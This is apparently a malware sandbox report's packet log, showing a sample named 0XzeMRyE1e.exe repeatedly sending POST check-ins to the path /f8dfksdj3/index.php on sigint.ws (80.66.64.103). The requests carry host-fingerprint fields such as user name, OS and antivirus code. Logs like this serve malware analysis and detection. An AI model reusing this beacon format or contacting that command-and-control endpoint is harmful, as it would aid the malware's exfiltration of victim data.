                                                                              Date: Wed, 01 Jun 2022 23:55:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              132 | 192.168.2.4 | 49912 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:11.068305969 CEST | 3617 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:11.249368906 CEST | 3618 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              133 | 192.168.2.4 | 49913 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:11.452857018 CEST | 3618 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:11.636411905 CEST | 3619 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              134 | 192.168.2.4 | 49914 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:11.848128080 CEST | 3619 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:12.031982899 CEST | 3620 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              135 | 192.168.2.4 | 49915 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:12.229808092 CEST | 3620 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:12.410557032 CEST | 3621 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              136 | 192.168.2.4 | 49916 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:12.621331930 CEST | 3621 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:12.802454948 CEST | 3621 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              137 | 192.168.2.4 | 49917 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:13.026840925 CEST | 3622 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:13.206803083 CEST | 3622 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              138 | 192.168.2.4 | 49918 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:13.415553093 CEST | 3623 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:13.595098019 CEST | 3623 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              139 | 192.168.2.4 | 49919 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:13.807547092 CEST | 3624 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:13.991605997 CEST | 3624 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              14 | 192.168.2.4 | 49788 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:00.640844107 CEST | 3410 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:00.823488951 CEST | 3410 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              140 | 192.168.2.4 | 49922 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:14.194314003 CEST | 3638 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:14.373663902 CEST | 3642 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              141 | 192.168.2.4 | 49925 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:14.580878973 CEST | 3643 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:14.763034105 CEST | 5065 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              142 | 192.168.2.4 | 49927 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:14.996722937 CEST | 5388 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:15.177180052 CEST | 6684 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              143 | 192.168.2.4 | 49928 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:15.391347885 CEST | 6685 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:15.572180986 CEST | 7804 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              144 | 192.168.2.4 | 49929 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:15.780137062 CEST | 7805 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:15.961910009 CEST | 7805 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              145 | 192.168.2.4 | 49930 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:16.173253059 CEST | 7806 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:16.358006001 CEST | 7808 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              15 | 192.168.2.4 | 49789 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:01.077017069 CEST | 3411 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:01.258260965 CEST | 3411 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              16 | 192.168.2.4 | 49790 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:01.502536058 CEST | 3412 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:01.682502031 CEST | 3412 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              17 | 192.168.2.4 | 49791 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:01.965477943 CEST | 3413 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:02.146214008 CEST | 3413 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              18 | 192.168.2.4 | 49792 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:02.409045935 CEST | 3414 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:02.592430115 CEST | 3414 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              19 | 192.168.2.4 | 49793 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:02.814058065 CEST | 3415 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:02.996304989 CEST | 3415 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              2 | 192.168.2.4 | 49767 | 185.199.108.133 | 443 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              20 | 192.168.2.4 | 49794 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:03.209829092 CEST | 3415 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:03.389816999 CEST | 3416 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              21 | 192.168.2.4 | 49795 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:03.603998899 CEST | 3416 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:03.787997007 CEST | 3417 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              22 | 192.168.2.4 | 49796 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:04.522416115 CEST | 3417 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:04.702900887 CEST | 3418 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              23 | 192.168.2.4 | 49797 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:07.717713118 CEST | 3418 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
